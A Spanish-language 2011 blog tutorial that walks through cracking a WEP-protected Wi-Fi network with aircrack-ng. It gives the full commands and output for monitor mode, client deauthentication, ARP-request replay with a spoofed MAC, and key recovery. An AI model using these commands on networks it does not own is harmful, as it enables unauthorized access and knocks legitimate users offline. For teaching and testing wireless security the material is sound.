Seguridad y Redes: Ataque 0: Deauthentication + Ataque 3: ARP Packets Injection = Cracking WEP

En este post veremos como se obtiene la clave WEP de una red inalambrica con un cliente conectado. Para este escenario realizamos dos ataques. El primero sera el ataque 0 o bien la deautenticación que consiste en deautenticar al cliente conectado al Punto de Acceso. El segundo lanzaremos el Ataque 3: Reinyección de una petición ARP (ARP-request) para generar nuevos IVs (vectores de inicialización).

Lo primero es poner la tarjeta en modo monitor.

root@bt:~# airmon-ng start wlan0

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
6179    dhclient

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
(monitor mode enabled on mon0)

root@bt:~#

Una vez puesto la tarjeta en modo monitor con airmon-ng. Ahora toca lanzar la herramienta airodump-ng buscar las redes wifi disponibles. Para esto tecleamos el siguiente comando en consola.

root@bt:~# airodump-ng mon0

CH  8 ][ Elapsed: 0 s ][ 2011-03-18 02:21

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:18:3F:18:85:C9    5        1        2    0   6  54 . WEP  WEP         WifiAttack

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:18:3F:18:85:C9  0C:60:76:71:D5:5B    1   54 -54      0        2

root@bt:~#

Como podemos ver tenemos una red disponible y también hay un cliente conectado a dicha red. Ahora lanzamos airodump-ng para que escuche todo el trafico de la red con el nombre de "WifiAttack".

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

Ataque 0: Deautenticación

Ahora toca lanzar el ataque 0 para deautenticar al cliente conectado a la red "WifiAttack". El cliente tiene la direccion MAC 0C:60:76:71:D5:5B. Para esto lanzamos el siguiente comando.

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0

02:27:39  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
02:27:39  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [34|63 ACKs]
02:27:40  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [17|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:42  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [13|63 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [22|65 ACKs]
02:27:44  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [18|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [16|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [14|64 ACKs]
root@bt:~#

El numero 10 es el número de deautenticaciones a enviar. Una vez desasociado el cliente lanzamos el ataque 3 para generar nuevos IVs (vectores de inicialización).

Ataque 3: ARP-Request

Lanzamos el ataque 3 (ARP-request reinjection) de aireplay-ng para aumentar la velocidad de captura de los IVs (vectores de inicialización).

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0

The interface MAC (00:C0:CA:4A:82:97) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 0C:60:76:71:D5:5B
02:28:07  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
Saving ARP requests in replay_arp-0318-022807.cap
You should also start airodump-ng to capture replies.
Read 81421 packets (got 27178 ARP requests and 26333 ACKs), sent 29719 packets...(49
root@bt:~#

Lo que sucede en este paso es, que areplay-ng escucha hasta encontrar un paquete ARP y cuando encuentra este paquete lo que hace es retransmitirlo hacia el punto de acceso, esto provoca que el AP tenga que repetir el paquete ARP con un IV nuevo y al retransmitir y retransmitir los paquetes ARP tendremos mas IVs que nos permitirán averiguar la clave WEP.

Cuando ya tengamos suficientes paquetes de datos (#Data) lanzamos aircrack-ng para crackear la Clave WEP. Abrimos consola y ejecutar aircrack-ng con el nombre del archivo guardado, en este caso es captura-01.cap

root@bt:~# aircrack-ng captura-01.cap

Opening captura-01.cap
Read 86840 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:18:85:C9  WifiAttack                WEP (19315 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 19477 ivs.

                                  Aircrack-ng 1.1 r1738

                     [00:00:00] Tested 4 keys (got 19189 IVs)

 KB    depth   byte(vote)
 0    0/  1    76(26624) 1E(26112) 4D(25088) E6(24576) A5(24064) 25(23808) 36(23808
 1    0/  2    53(26368) 78(26112) 92(24832) BD(24320) 1A(23808) 0B(23552) 59(23552
 2    0/  2    95(25856) C1(25856) 3E(25088) BB(24064) DD(24064) BF(23296) ED(23296
 3    0/  1    92(27392) 40(25088) 08(24576) 45(23808) 8F(23808) 20(23296) 97(23296
 4    0/  1    80(27392) F2(26112) 46(24832) 4D(24576) 71(24576) 0E(24320) 85(24064

                       KEY FOUND! [ 76:02:95:92:80 ]
       Decrypted correctly: 100%

Seguridad y Redes

2011-04-09

Ataque 0: Deauthentication + Ataque 3: ARP Packets Injection = Cracking WEP

No hay comentarios:

Publicar un comentario